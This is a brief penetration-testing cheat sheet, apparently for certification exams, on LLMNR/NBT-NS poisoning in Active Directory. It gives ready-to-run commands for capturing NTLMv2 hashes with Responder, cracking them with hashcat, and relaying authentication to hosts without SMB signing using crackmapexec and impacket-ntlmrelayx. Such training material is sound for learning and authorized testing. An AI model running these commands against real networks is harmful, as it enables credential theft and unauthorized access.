LLMNR/NBT-NS Poisoning
Active Directory
Overview
Capture hashes via Link-Local Multicast Name Resolution and NetBIOS Name Service poisoning.
Cheatsheet
Responder
sudo responder -I eth0 -rdwv # Start Responder on eth0
Captured Hashes
# Location
/usr/share/responder/logs/ # Log directory
# Format: NTLMv2
user::DOMAIN:challenge:response:... # Hash format
Crack with Hashcat
hashcat -m 5600 hash.txt wordlist.txt # Crack NTLMv2 hashes
Relay Attack
# If SMB signing disabled
impacket-ntlmrelayx -tf targets.txt -smb2support # Relay NTLM auth to targets
# Targets without signing
crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt # Find relay targets
Common Pitfalls
- Responder can cause network issues
- Only works on the local subnet (LLMNR and NBT-NS queries are link-local multicast/broadcast and are not routed)
- NTLMv2 can be slow to crack
Exam Survival Tips
- Run Responder early, capture while enumerating
- Check for SMB signing for relay
- Use strong wordlist + rules